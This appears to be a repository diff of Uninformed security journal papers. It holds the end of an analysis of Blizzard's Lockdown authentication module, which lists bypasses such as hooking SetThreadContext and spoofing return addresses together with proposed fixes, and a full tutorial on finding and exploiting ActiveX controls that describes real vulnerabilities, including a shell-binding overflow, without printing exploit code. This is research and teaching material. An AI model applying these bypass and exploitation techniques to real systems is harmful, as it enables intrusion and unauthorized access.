the Battle.net server could support multiple "flavors" of version check module
|
||||
that could be distributed to clients in order to increase the amount of work
|
||||
required by anyone seeking to reimplement the version check and authentication
|
||||
system.
|
||||
|
||||
The original "ver" module and associated authentication scheme in fact utilized
|
||||
such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon
|
||||
this trend. In the original system, there were 8 possible modules to choose
|
||||
from; the Lockdown system, by contrast, expands this to a set of 20
|
||||
possibilities. However, the version check modules in both systems are still
|
||||
very similar to one another. In both systems, each module has its own unique
|
||||
key (a 32-bit values in the "ver" system, and a 64-bit value in the Lockdown
|
||||
system) that is used to influence the result of the version check checksum (it
|
||||
should be noted that in the Lockdown system, the actual Lockdown module
|
||||
itself is in essence a second "key", as the added checksum over the module
|
||||
represents an additional adjustment to the final checksum result that changes
|
||||
with each Lockdown module). This single difference is disguised by other
|
||||
minor, superficial alterations to each module flavor; there are slight
|
||||
differences by which module base addresses are retrieved, for instance, and
|
||||
there are also other superficial differences that relate to differences like
|
||||
code being moved between functions or functions being re-arranged in the final
|
||||
binary in order to frustrate a simple "diff" of two Lockdown modules as
|
||||
being informative in revealing the functional differences between the said two
|
||||
modules.
|
||||
|
||||
This protection mechanism is perhaps best classed as an anti-analysis scheme,
|
||||
as it attempts to create more work for anyone attempting to reverse engineer
|
||||
the authentication system as a whole.
|
||||
|
||||
2.6) Authenticity Check Performed on Lockdown Module Caller
|
||||
|
||||
An additional new protection scheme introduced in the Lockdown module is a
|
||||
rudimentary check on the authenticity of the caller of the module's export,
|
||||
the CheckRevision routine. Specifically, the module attempts to ascertain
|
||||
whether the return address of the call to the CheckRevision routine points to a
|
||||
code location within the Battle.snp module. If the return pointer for the call
|
||||
to CheckRevision is not within the expected range, then an error is
|
||||
deliberately introduced into the checksum calculations, ultimately resulting in
|
||||
the result returned by the Lockdown module becoming invalidated.
|
||||
|
||||
3) Attacks (and Counter-Attacks) on the Lockdown System
|
||||
|
||||
Though the Lockdown module introduces a number of new defensive mechanisms
|
||||
that attempt to thwart would-be attackers, these systems are far from
|
||||
fool-proof. There are a number of ways that these defensive systems could be
|
||||
attacked (or subverted) by a would-be attacker who wishes to pass the version
|
||||
and authentication check in the context of a non-genuine client for purposes of
|
||||
logging on to Battle.net. In addition, there are also a variety of different
|
||||
ways by which these proposed attacks could be thwarted in a future update to
|
||||
the version check and authentication system.
|
||||
|
||||
3.1) Interception of SetThreadContext
|
||||
|
||||
As previously described, the Lockdown modules attempt to disable the use of
|
||||
the processor's complement of debug registers in order to make it difficult
|
||||
to utilize so-called hardware breakpoints during the process of reverse
|
||||
engineering or analyzing a Lockdown module. This scheme is, at present,
|
||||
relatively easily compromised, however.
|
||||
|
||||
There are several possible attacks that could be used:
|
||||
|
||||
1. Hook the SetThreadContext API and block attempts to disable debug registers
|
||||
(programmatic).
|
||||
2. Patch the import address table entry for SetThreadContext in the Lockdown
|
||||
module to point to a custom routine that does nothing (programmatic).
|
||||
3. Patch the Lockdown module instruction code to not call SetThreadContext in
|
||||
the first place (programmatic). However, this is approach is considered to
|
||||
be generally untenable, due to the memory checksum protection scheme.
|
||||
4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies
|
||||
the hardware breakpoint state after the call, or simply alters execution
|
||||
flow to immediately return (debugger).
|
||||
|
||||
Depending on whether the attacker wants to make programmatic alterations to the
|
||||
behavior of the Lockdown module via hardware breakpoints, or simply wishes
|
||||
to observe the behavior of the module in the debugger unperturbed, there are
|
||||
several options available.
|
||||
|
||||
The suggested counters include techniques such as the following:
|
||||
|
||||
1. Verify that the debug registers were really cleared. However, this could
|
||||
simply be patched out as well. More subtle would be to include the value
|
||||
of several debug registers in the checksum calculations, but this would also
|
||||
be fairly obvious to attackers due to the fact that debug registers cannot be
|
||||
directly accessed from user mode and require a call to Get/SetThreadContext,
|
||||
or the underlying NtGet/SetContextThread system calls.
|
||||
2. Include additional calls to disable debug register usage in different
|
||||
locations within the Lockdown module. To be most effective, these would
|
||||
need to be inlined and use different means to set the debug register state.
|
||||
For example, one location could use a direct import, another could use a
|
||||
GetProcAddress dynamic import, a third could manually walk the EAT of
|
||||
kernel32 to find the address of SetThreadContext, and a fourth could make
|
||||
a call to NtSetContextThread in ntdll, and a fifth could disassemble the
|
||||
opcodes comprising NtSetContextThread, determine the system call ordinal,
|
||||
and make the system call directly (e.g. via `int 2e'). The goal here is to
|
||||
add additional work and eliminate "single points of failure" from the
|
||||
perspective of an attacker seeking to disable the anti-debugging feature.
|
||||
Note that the direct system call approach will require additional work in
|
||||
order to function under Wow64 (e.g. x64 computers running native Windows
|
||||
x64).
|
||||
3. Verify that all IAT entries corresponding to kernel32 actually point to the
|
||||
same module in-memory. This is risky, though, as in some cases (such as when
|
||||
the Microsoft application compatibility layer module is in use), these APIs
|
||||
may be legitimately detoured.
|
||||
|
||||
3.2) Use of Hardware Breakpoints
|
||||
|
||||
Assuming an attacker can compromise the anti-debugging protection scheme, then
|
||||
he or she is free to make clever use of hardware breakpoints to disable other
|
||||
protection systems (such as hardcoded base addresses of modules, checks on the
|
||||
authenticity of a CheckRevision caller, and soforth) by setting execute fetch
|
||||
breakpoints on choice code locations. Then, the attacker could simply alter
|
||||
the execution context when the breakpoints are hit, in order to bypass other
|
||||
protection mechanisms. For example, an attacker could set a read breakpoint
|
||||
on the hardcoded base address for the main process image inside the Lockdown
|
||||
module, and change the base address accordingly. The attacker would also
|
||||
have to patch GetModuleHandleA in order to complete this example attack.
|
||||
|
||||
Suggested counters to attacks based on hardware breakpoints include:
|
||||
|
||||
1. Validation of the vectored exception handler chain, which might be used to
|
||||
intercept STATUSSINGLESTEP exceptions when hardware breakpoints are hit.
|
||||
This is risky, as there are legitimate reasons for there to be "foreign"
|
||||
vectored exception handlers, however.
|
||||
2. Checks to stop debuggers from attaching to the process, period. This is not
|
||||
considered to be a viable solution since there are a number of legitimate
|
||||
reasons for a debugger to be attached to a process, many of them which may
|
||||
be unknown completely to the end user (such as profilers, crash control and
|
||||
reporting systems, and other types of security software). Attempting to
|
||||
block debuggers may also prevent the normal operation of Windows Error
|
||||
Reporting or a preconfigured JIT debugger in the event of a game crash,
|
||||
depending on the implementation used. Ways of detecting debuggers include
|
||||
calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..),
|
||||
checks against NtCurrentPeb()->BeingDebugged, and soforth.
|
||||
3. Duplication of checks (perhaps in slightly altered forms) throughout the
|
||||
execution of the checksum implementation. It is important for this
|
||||
duplication to be inline as much as possible in order to eliminate single
|
||||
points of failure that could be used to short-circuit protection schemes by
|
||||
an attacker.
|
||||
4. Strengthening of the anti-debugging mechanism, as previously described.
|
||||
|
||||
3.3) Main Process Image Module Base Address Restriction
|
||||
|
||||
An attacker seeking to execute the Lockdown module in an untrusted process
|
||||
would need to bypass the restrictions on the base address of the main process
|
||||
image. The most likely approach to this would be a combination attack, whereby
|
||||
the attacker would use something like a set of hardware breakpoints to alter
|
||||
the hardcoded restrictions on module base addresses, and import table or code
|
||||
patch style hooks on the GetModuleHandleA API in order to defeat the secondary
|
||||
check on the module base address for the main executable image.
|
||||
|
||||
Another approach would be to simply create the main executable image as a
|
||||
process, suspended, and then either create a new thread in the process or
|
||||
assume control of the initial thread in order to execute the Lockdown module.
|
||||
This gets the would-be attacker out of having to patch checks in the module, as
|
||||
there is currently no defense against this case implemented in the module.
|
||||
|
||||
In order to strengthen this protection mechanism, the following approaches
|
||||
could be taken:
|
||||
|
||||
1. Manually traverse the loaded module list (and examine the PEB) in order to
|
||||
validate that the main process image is really at 0x00400000. All of these
|
||||
mechanisms could be compromised, but checking each one creates additional
|
||||
work for an attacker.
|
||||
2. Verify that the game has initialized itself to some extent. This would
|
||||
make the approach of creating the game process suspended more difficult. It
|
||||
would also otherwise make the use of the Lockdown module in an untrusted
|
||||
process more difficult without tricking the module into believing that it is
|
||||
running in an initialized game process. The scope of determining how the
|
||||
game is initialized is outside of this paper, although an approach similar
|
||||
to the current one based on a checksum of Storm video memory (though with
|
||||
more "redundancy", or an additional matrix of requirements for a legitimate
|
||||
game process).
|
||||
|
||||
3.4) Minor Functional Differences Between Lockdown Module Flavors
|
||||
|
||||
Presently, an attacker needs to implement all flavors of the Lockdown module
|
||||
in order to be assured of a successful connection to Battle.net. However,
|
||||
even with the 20 possibilities now available, this is still not difficult due
|
||||
to the minor functional differences between the different Lockdown flavors.
|
||||
Moreso, it is trivially possible to find the "magic" constants that constitute
|
||||
the only functional differences between each flavor of Lockdown.
|
||||
|
||||
In the author's tests, two pattern matches and a small 200-line C program were
|
||||
all that were necessary to programmatically identify all of the magical
|
||||
constants that represent the functional differences between each flavor of
|
||||
Lockdown module, in a completely automated fashion. In fact, the author would
|
||||
wager that it took more time to implement all 20 different flavors of Lockdown
|
||||
modules than it took to devise and implement a rudimentary pattern matching
|
||||
system to automagically discover all 20 magical constants from the set of 20
|
||||
Lockdown module flavors. Clearly, this is not desirable from the standpoint
|
||||
of effort put in to the protection scheme vs difficulty in attacking it.
|
||||
|
||||
In order to address these weaknesses, the following steps could be implemented:
|
||||
|
||||
1. Implement true, major functional differences between Lockdown flavors.
|
||||
Instead of using a single constant value that is different between each
|
||||
flavor (probably a "" preprocessor constant), implement other,
|
||||
real functional differences. Otherwise, even with a number of different
|
||||
"non-functional" differences between module flavors, a pattern-matching
|
||||
system will be able to quickly locate the different constants for each
|
||||
module after a human attacker has discovered the constant for at least one
|
||||
module flavor.
|
||||
2. Avoid using quick-to-substitute constants as the "meat" of the functional
|
||||
differences betwene flavors. While these are convenient from a development
|
||||
perspective, they are also convenient from an attacker perspective. If a
|
||||
bit more time were spent from a development perspective, attackers could be
|
||||
made to do real analysis of each module separately in order to determine the
|
||||
actual functional differences, greatly increasing the amount of time that is
|
||||
required for an attacker to defeat this protection scheme.
|
||||
|
||||
3.5) Spoofed Return Address for CheckRevision Calls
|
||||
|
||||
Due to how the x86 architecture works, it is trivially easy to spoof the return
|
||||
address pointer for a procedure call. All that one must do is push the spoofed
|
||||
return address on the stack, and then immediately execute a direct jump to the
|
||||
target procedure (as opposed to a standard call).
|
||||
|
||||
As a result, it is fairly trivial to bypass this protection mechanism at
|
||||
run-time. One need only search for a `ret' opcode in the code space of the
|
||||
Battle.snp module in memory, and use the technique described previously to
|
||||
simply "bounce" the call off of Battle.snp via the use of a spoofed return
|
||||
address. To the Lockdown module, the call will appear to originate from the
|
||||
context of Battle.snp, but in reality the call will immediately return from
|
||||
Battle.snp to the real caller in the untrusted process.
|
||||
|
||||
To counter this, the following could be attempted:
|
||||
|
||||
1. Verify two return addresses deep, although due to the nature of the x86
|
||||
calling conventions (at least stdcall and fastcall, the two used by
|
||||
Blizzard code frequently), it is not guaranteed that four bytes past the
|
||||
return address will be a particularly meaningful value.
|
||||
2. Verify that the return address does not point directly to a `ret', `jmp',
|
||||
`call' or similar instruction, assuming that current Battle.snp variations do
|
||||
not use such patterns in their call to the module. This only slightly raises
|
||||
the bar for an attacker, though; he or she would only need pick a more
|
||||
specific location in Battle.snp through which to stage a call, such as the
|
||||
actual location used in normal calls to the Lockdown module.
|
||||
|
||||
3.6) Limited Pool of Challenge/Response Tuples
|
||||
|
||||
Presently, the Battle.net servers contain a fairly limited pool of possible
|
||||
challenge/response pairs for the version check and authentication system.
|
||||
Observations suggest that most products have a pool of around one thousand
|
||||
values that can be sent to clients. This has been used against Battle.net in
|
||||
the past, which was countered by an increase to 20000 possible values for
|
||||
several Battle.net products. Even with 20000 possible values, though, it is
|
||||
still possible to capture a large number of logon attempts over time and build
|
||||
a lookup table of possible values. This is an attractive option for an
|
||||
attacker, as he or she need only perform passive analysis over a period of time
|
||||
in order to construct a database capable of logging on to Battle.net with a
|
||||
fairly high success rate. Given the relative infrequency of updates to the
|
||||
pool of version check values (typically once per patch), this is considered to
|
||||
be a fairly viable method for an attacker to bypass the version check and
|
||||
authentication system.
|
||||
|
||||
This limitation could easily be addressed by Blizzard, however, such as through
|
||||
the implementation of one or more of the below suggestions:
|
||||
|
||||
1. Periodically rotate the set of possible version check values so as to ensure
|
||||
that a database of challenge/response pairs would quickly expire and need to
|
||||
be rebuilt. Combined with a large pool of possible values, this approach
|
||||
would greatly reduce the practicality of this attack. Unfortunately, the
|
||||
author suspects that this would require manual intervention each time the
|
||||
pools were to be rotated by the part of Blizzard in the current Battle.net
|
||||
server implementation.
|
||||
2. Implement dynamic generation of pool values at runtime on each Battle.net
|
||||
server. This would require the server to have access to the requisite client
|
||||
binaries, but is not expected to be a major challenge (especially since the
|
||||
author suspects that Battle.net is powered by Windows already, which would
|
||||
allow the existing Lockdown module code to be cleaned up and repackaged for
|
||||
use on the server as well). This could be implemented as a pool of possible
|
||||
values that is simply stirred every so often; new challenge/response values
|
||||
need not necessarily be generated on each logon attempt (and doing so would
|
||||
have undesirable performance implications in any case).
|
||||
|
||||
4) Conclusion
|
||||
|
||||
Although the Lockdown module and associated authentication system represent
|
||||
a major break in Blizzard's ongoing battle against non-genuine Battle.net
|
||||
client software, there are still many improvements that could be made in a
|
||||
future release of the version check and authentication system which would fit
|
||||
within the constraints imposed on the version check system, and still pose a
|
||||
significant challenge to an adversary attempting to spoof Battle.net logons
|
||||
using a non-genuine clients. The author would encourage Blizzard to consider
|
||||
and implement enhancements akin to those described in this paper, particularly
|
||||
protections that overlap and complement each other (such as the debug register
|
||||
clearing and memory checksum schemes).
|
||||
|
||||
In the vein of improving the Lockdown system, the author would like to stress
|
||||
the following principles as especially important in creating a system that is
|
||||
difficult to defeat and yet still workable and viable from a development and
|
||||
deployment perspective:
|
||||
|
||||
- Defense in depth with respect to the various protection mechanisms in place
|
||||
within the module is a must. Protection systems need to be designed to
|
||||
complement and reinforce eachother, such that an attacker must defeat a
|
||||
number of layers of protection schemes for any one significant attack to
|
||||
succeed to the point of being a break in the system.
|
||||
|
||||
- Countermeasures intended to frustrate reverse engineering or easy duplication
|
||||
of critical algorithms need to be viewed in the light of what an adversary
|
||||
might do in order to 'attack' (or duplicate, re-implement, or whatnot) a
|
||||
'guarded' (or otherwise important) algorithm or section of code. For
|
||||
example, an attacker could ease the work of reimplementing parts of an
|
||||
algorithm or function of interest by wholesale copying of assembler code
|
||||
into a different module, or by loading an "authentic" module and making
|
||||
direct calls into internal functions (or the middle of internal functions) in
|
||||
an effort to bypass "upstream" protection checks. Keeping with this line of
|
||||
thinking, it would be advisible to interleave protection checks with code
|
||||
that performs actual useful work to a certain degree, such that it is less
|
||||
trivial for an adversary to bypass protection checks that are entirely done
|
||||
"up front" (leaving the remainder of a secret algorithm or function
|
||||
relatively "vulnerable", if the check code is skipped entirely).
|
||||
|
||||
- Countermeasures intended to create "time sinks" for an adversary need to be
|
||||
carefully designed such that they are not easily bypassed. For instance, in
|
||||
the current Lockdown module implementation, there are twenty flavors of the
|
||||
Lockdown module; yet, in this implementation, it is trivially easy for an
|
||||
adversary to discover the differences (in a largely programmatic fashion),
|
||||
making this "time sink" highly ineffective, as the time for an adversary to
|
||||
breach it is likely much less than the time for the original developers to
|
||||
have created it.
|
||||
|
||||
- Measures that depend on external, imported APIs are often relatively easy for
|
||||
an attacker to quickly pinpoint and disable (for example, the method that
|
||||
debug register breakpoints are disabled by the Lockdown module is
|
||||
immediately obvious to an adversary, if they are even the least bit familiar
|
||||
with the Win32 API (which must be assumed). In some cases (such as with the
|
||||
debug register breakpoint clearing code), this cannot be avoided, but in
|
||||
others (such as validation of module base addresses), the same effect could
|
||||
be potentially implemented by use of less-obvious approaches (for example
|
||||
manually traversing the loaded module list by locating the PEB and the
|
||||
loader data structures from the backlink pointer in the current thread's
|
||||
TEB). The author would encourage the developers of additional defensive
|
||||
measures to reduce dependencies on easily-noticible external APIs as much as
|
||||
possible (balanced, of course, against the need for maintainable code that
|
||||
executes on all supported platforms). In some instances, such as the manual
|
||||
resolution of Storm symbols, the current system does do a fair job of
|
||||
avoiding easily-detectable external API use.
|
||||
|
||||
All things considered, the Lockdown system represents a major step forward in
|
||||
the vein of guarding Battle.net from unauthorized clients. Even so, there is
|
||||
still plenty of room for improvements in potential future revisions of the
|
||||
system. The author hopes that this article may prove useful in the
|
||||
strengthening of future defensive systems, by virtue of a thorough accounting
|
||||
of the strengths and weaknesses in the current Lockdown module (and pointed
|
||||
suggestions as to how to repair certain weaker mechanisms in the current
|
||||
implementation).
|
297
uninformed/9.2.txt
Normal file
297
uninformed/9.2.txt
Normal file
|
@ -0,0 +1,297 @@
|
|||
ActiveX - Active Exploitation
|
||||
01/2008
|
||||
warlord
|
||||
warlord@nologin.org
|
||||
http://www.nologin.org
|
||||
|
||||
Share what I know, learn what I don't
|
||||
|
||||
1) Foreword
|
||||
|
||||
First of all, I'd like to explain what this paper is all about, and
|
||||
especially, what it is not. A few months ago I got into the technical details
|
||||
of ActiveX for the first time. Prior to this point I only had some vague
|
||||
ideas and a general understanding of what it is and how it works. What I did
|
||||
first is probably quite obvious: I googled. To my surprise though, I could
|
||||
not find a single paper discussing ActiveX and how to exploit it. My next step
|
||||
was to contact some generally smart and knowledgable friends to harvest the
|
||||
required information from them. I was even more surprised to find that some of
|
||||
the most skilled people out there lacked the same knowledge that I did.
|
||||
Perhaps it's our common background, coming from the Unix/Linux world, but
|
||||
whatever the reason, I had to work to collect the information I now possess.
|
||||
But still, I feel like I'm the one-eyed man explaining what the world looks
|
||||
like to the blind.
|
||||
|
||||
The fact that there are tons of ActiveX exploits on Milw0rm which would
|
||||
suggest that the knowledge is out there by now. I wonder why no one took the
|
||||
time to write it all up so the less knowledgable may get into this theater as
|
||||
well. It's the intention of this paper to fill this gap. If you already know
|
||||
everything about ActiveX, if you've found your own 0day and exploited it
|
||||
successfully, I probably can't teach you any new tricks. Everyone else I
|
||||
invite to read on.
|
||||
|
||||
2) Introduction
|
||||
|
||||
ActiveX[1] is a Microsoft technology introduced in 1996 and based on
|
||||
the Component Object Model (COM) and Object Linking and Embedding (OLE)
|
||||
technologies. The intention of COM has been to create easily reusable pieces of
|
||||
code by creating objects that offer interfaces which can be called by other
|
||||
COM objects or programs. This technology is widely used for what
|
||||
Microsoft calls ActiveX[2] which represents the integration of COM
|
||||
into Internet Explorer. This integration offers the ability to interface
|
||||
with Windows as well as third-party applications with the MS browser. This
|
||||
allows for the easy extension of functionality in the Internet Explorer by
|
||||
giving software developers the ability to create complex applications which
|
||||
can interface with websites through the browser.
|
||||
|
||||
There are various ways for an ActiveX control to end up on any given machine.
|
||||
Besides all the controls which are part of IE or the operating system,
|
||||
programs may install and register ActiveX controls of their own to offer a
|
||||
diverse set of functions in IE. Another way of installing a new control is
|
||||
through web sites themselves. Depending on Internet Explorer security
|
||||
settings, a website may try to instantiate a control, for example Shockwave
|
||||
Flash, and failing to do so may prompt the user to install the Shockwave Flash
|
||||
ActiveX control.
|
||||
|
||||
Security issues seems to be a constant problem with ActiveX controls.
|
||||
In fact, it seems most vulnerabilities in Windows nowadays are actually due to
|
||||
poorly-written third-party controls which allow malicious websites to exploit
|
||||
buffer overflows or abuse command injection vulnerabilities. Quite often
|
||||
these controls make the impression of their authors not having realized their
|
||||
code can be instantiated from a remote website.
|
||||
|
||||
The following chapters will describe methods to find, analyze, and exploit
|
||||
bugs in ActiveX controls will be presented to the reader.
|
||||
|
||||
3) Control and functionality enumeration
|
||||
|
||||
Any given Windows installation is likely to have a significant number of
|
||||
registered COM objects. For the purpose of this paper, however, we are only
|
||||
interested in controls which may be instantiated from a website. Quite a
|
||||
number of the following details are taken out of the excellent "The Art
|
||||
of Software Security Assessment"[3], a book I strongly recommend to
|
||||
anyone interested in application security.
|
||||
|
||||
ActiveX controls are usually, but not always, instantiated by passing their
|
||||
CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as
|
||||
a unique value which is associated with each control in order to distinguish
|
||||
it from its peers. A list of all the existing CLSIDs on a given Windows
|
||||
installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which
|
||||
actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID.
|
||||
|
||||
Within the CLSID key there are thousands of different class identifiers, all
|
||||
of them specifying ActiveX controls. However, only a subset of those can be
|
||||
instantiated by a website. Controls marked as safe for scripting are granted
|
||||
this ability. To determine whether a certain control has this ability, it has
|
||||
to be part of the respective category. Specifically, the category can be
|
||||
found in the registry in the form: HKEY_CLASSES_ROOT\CLSID\<control
|
||||
clsid>\Implemented Categories. If a control is safe for scripting it may
|
||||
indicate this by having a subkey with the GUID
|
||||
7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for initialization'
|
||||
category is listed in the same location, but with a slightly different GUID.
|
||||
Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4.
|
||||
|
||||
In the end though, not being part of these categories doesn't necessarily mean
|
||||
that a control cannot be called from IE. The component may dynamically report
|
||||
itself as being safe for scripting when it is instantiated through IE. The
|
||||
only surefire way is to try and instantiate a control and see if it can be
|
||||
used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate this
|
||||
check for all of the different CLSIDs on a system. Another tool to enumerate
|
||||
the controls in question is iDefense's ComRaider[4], another ActiveX fuzzer,
|
||||
which has the ability to build a database of controls that IE should be able
|
||||
to instantiate.
|
||||
|
||||
3.1) ProgIDs
|
||||
|
||||
Besides the long and rather hard to memorize CLSID there is often a second
|
||||
way of instantiating a certain control. This can be accomplished through the
|
||||
use of a control's program ID (progID). Quite similar to IP addresses and the
|
||||
domain name system(DNS), progIDs can be looked up to determine the matching
|
||||
CLSID. Once the right one has been determined, Internet Explorer goes on as
|
||||
if the CLSID had been provided in the first place.
|
||||
|
||||
For this technique to work for a given control, two requirements must be met.
|
||||
First, a control must have a ProgID subkey under their CLSID key in the
|
||||
register. ProgIDs are usually in the form Program.Component.Version such as
|
||||
SafeWia.Script.1. Second, as there is no point for Windows to walk through up
|
||||
to 2700 CLSIDs(in my example) to find the specified ProgID, the program ID
|
||||
itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which
|
||||
describes makes the association.
|
||||
|
||||
3.2) The Kill Bit
|
||||
|
||||
In some cases it is desirable to restrict a control from ever being
|
||||
instantiated in IE. This can be accomplished through the use of a
|
||||
kill bit. The kill bit can be defined by setting the 0x00000400 bit
|
||||
in the DWORD associated with a given CLSID:
|
||||
|
||||
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>
|
||||
|
||||
3.3) User Specific Controls
|
||||
|
||||
With Windows XP, Microsoft introduced support for user-specific ActiveX
|
||||
controls. These do not require Administrator-level access to install because
|
||||
the controls are specific to a certain user, as the name already implies.
|
||||
These controls can be found under HKEY_CURRENT_USER\Software\Classes. While
|
||||
this functionality exists, most ActiveX controls are installed globally.
|
||||
|
||||
3.4) Determining Exported Functions
|
||||
|
||||
ActiveX controls implement various COM interfaces in the same manner as any
|
||||
other COM object. COM interfaces are well-defined definitions of what
|
||||
functions and properties a COM class must implement and support. COM provides
|
||||
the ability to dynamically query a COM class at runtime using QueryInterface
|
||||
to see what interfaces it implements. This is how IE determines if a control
|
||||
supports the safe for scripting interface (which is called IObjectSafety).
|
||||
|
||||
4) Examples
|
||||
|
||||
4.1) MW6 Technologies QRCode ActiveX 3.0
|
||||
|
||||
In this section the previously provided information will be demonstrated with
|
||||
the help of a recent public ActiveX vulnerability and exploit. The vulnerable
|
||||
control is from a company called WM6 and comes with their ``QRCode ActiveX''
|
||||
version 3.0. When I downloaded the software in January 2008, several months
|
||||
after the exploit was posted on Milw0rm in September, the vulnerable control
|
||||
was still part of the package.
|
||||
|
||||
The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After the
|
||||
installation of the software, it can be found in the registry in:
|
||||
|
||||
HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}
|
||||
|
||||
The DLL that implements this control can be found on the harddrive in the file
|
||||
that is specified in the "InprocServer32" key. In this example it is:
|
||||
|
||||
C:\WINDOWS\system32\MW6QRC~1.DLL
|
||||
|
||||
There are two interesting things to note here. For one, the ProgID key has a
|
||||
default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in
|
||||
the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the
|
||||
CLSID of that control. This tells us that this control can be instantiated
|
||||
using both its CLSID and ProgID. Another point of interest in the screenshot
|
||||
is the absence of the "Implemented Categories" key. This means that this
|
||||
control is neither part of the "safe for scripting" nor the "safe for
|
||||
initialization" category. However, it appears that the control must implement
|
||||
IObjectSafety since it is still possible to instantiate the control from IE.
|
||||
The following simple HTML code tries to instantiate the control.
|
||||
|
||||
<body>
|
||||
<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test'>
|
||||
</object>
|
||||
</body>
|
||||
|
||||
The result of this snippet of code is the appearance of a little picture in IE.
|
||||
As this works just fine without Internet Explorer complaining about being
|
||||
unable to load the control, the next examination step is in order.
|
||||
|
||||
4.1.1) Enumerating Exported Interfaces
|
||||
|
||||
By now it has been shown that the example control can be instantiated from IE
|
||||
just fine. The question now is what kind of interfaces the control provides to
|
||||
the caller. By submitting the specific CLSID of the control that is to be
|
||||
examined to ComRaider, the tool lists all of the controls implemented
|
||||
functions as well as the kind and number of expected parameters. An
|
||||
alternative to ComRaider is the so-called OLE-COM object viewer that comes
|
||||
with the platform SDK and Visual Studio.
|
||||
|
||||
4.1.2) Exploitation
|
||||
|
||||
After playing around with various functions, it soon becomes obvious that
|
||||
SaveAsBMP and SaveAsWMF happily accept any path provided to save the
|
||||
generated graphic in the specified location. This can make it possible to
|
||||
overwrite existing files with the picture if the user running IE has
|
||||
sufficient access. This is a perfect example of a program using untrusted
|
||||
data and operating on it without any kind of checks. It is likely that the
|
||||
control's author did not consider the security implications of what they were
|
||||
doing.
|
||||
|
||||
A sample exploit for this vulnerability, written by shinnai, can be found on
|
||||
Milw0rm: http://www.milw0rm.com/exploits/4420.
|
||||
|
||||
4.2) HP Info Center
|
||||
|
||||
On December 12th, 2007, a vulnerability in an ActiveX control which was
|
||||
shipped by default with multiple series of Hewlett Packard notebooks was
|
||||
disclosed. The issue itself was found in a piece of software called the HP
|
||||
Info Center. The vulnerability allowed remote read and write access to the
|
||||
registry as well as the execution of arbitrary commands. By instantiating
|
||||
this control in Internet Explorer and calling the vulnerable functions it was
|
||||
possible to run software with the same level of access as the user running IE.
|
||||
Porkythepig found and disclosed this serious threat and wrote a detailed
|
||||
report as well as a sample exploit covering three attack vectors.
|
||||
|
||||
The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was
|
||||
responsible for the listed vulnerabilities. By default it installs itself into
|
||||
C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky
|
||||
listed three potentially insecure methods as well as the expected parameters:
|
||||
|
||||
- VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
|
||||
- void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
|
||||
- void LaunchApp(String appPath, String params, int cmdShow);
|
||||
|
||||
While the first and second method allow for remote read and write access to
|
||||
the registry, the third function runs arbitrary programs. For example, an
|
||||
attacker could execute cmd.exe with arbitrary arguments.
|
||||
|
||||
In this example the vulnerable control provided remote access to the victims
|
||||
machine. Sample code to exploit all three functions can once again be found on
|
||||
Milw0rm: http://www.milw0rm.com/exploits/4720.
|
||||
|
||||
4.3) Vantage Linguistics AnswerWorks
|
||||
|
||||
The third and last example of various ActiveX vulnerabilities is in the
|
||||
Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were
|
||||
released in December, 2007. The awApi4.AnswerWorks.1 control exports several
|
||||
functions which are prone to stack-based buffer overflows. The functions
|
||||
GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long
|
||||
strings provided by a malicious website. The resulting stack-based buffer
|
||||
overflow allows for the execution of arbitrary code, as "e.b." demonstrates
|
||||
with a proof of concept that binds a shell to port 4444 when the exploit
|
||||
succeeds.
|
||||
|
||||
When the exploit is loaded from a webserver it instatiates the CLSID and links
|
||||
the created object to a variable named obj. It then calls the GetHistory()
|
||||
function with a carefully crafted string which consists of 214 A's to fill the
|
||||
buffer followed by a return address which overwrites the one saved on the
|
||||
stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As
|
||||
one can easily see, this exploit is based on the same techniques that can be
|
||||
seen in many other stack-based exploits.
|
||||
|
||||
The exploit mentioned in this example can also be found on Milw0rm:
|
||||
http://www.milw0rm.com/exploits/4825.
|
||||
|
||||
5) Summary
|
||||
|
||||
This paper has provided a brief introduction to ActiveX. The focus has been
|
||||
on discussing some of the underlying technology and security related issues
|
||||
that can manifest themselves. This was meant to equip the reader with enough
|
||||
background knowledge to examine ActiveX controls from a security point of
|
||||
view. The author hopes he managed to describe the big picture in enough detail
|
||||
to provide readers with enough information on the matter to base further
|
||||
research on the aquired knowledge.
|
||||
|
||||
5.1) Acknowledgements
|
||||
|
||||
wastedimage - For answering the first questions
|
||||
deft - For providing lots of answers and examples
|
||||
rjohnson - For filling in details deft forgot to mention
|
||||
skape - For background knowledge on underlying functions
|
||||
hdm - For knowing all the rest
|
||||
|
||||
References
|
||||
|
||||
[1] ActiveX Controls @ Wikipedia
|
||||
http://en.wikipedia.org/wiki/ActiveXcontrol
|
||||
|
||||
[2] ActiveX Controls
|
||||
http://msdn2.microsoft.com/en-us/library/aa751968.aspx
|
||||
|
||||
[3] The art of software security assessment
|
||||
http://taossa.com
|
||||
|
||||
[4] ComRaider
|
||||
http://labs.idefense.com/software/fuzzing.php#morecomraider
|
||||
|
||||
[5] Axman ActiveX Fuzzer
|
||||
http://www.metasploit.com/users/hdm/tools/axman/
|
679
uninformed/9.3.txt
Normal file
679
uninformed/9.3.txt
Normal file
|
@ -0,0 +1,679 @@
|
|||
Context-keyed Payload Encoding
|
||||
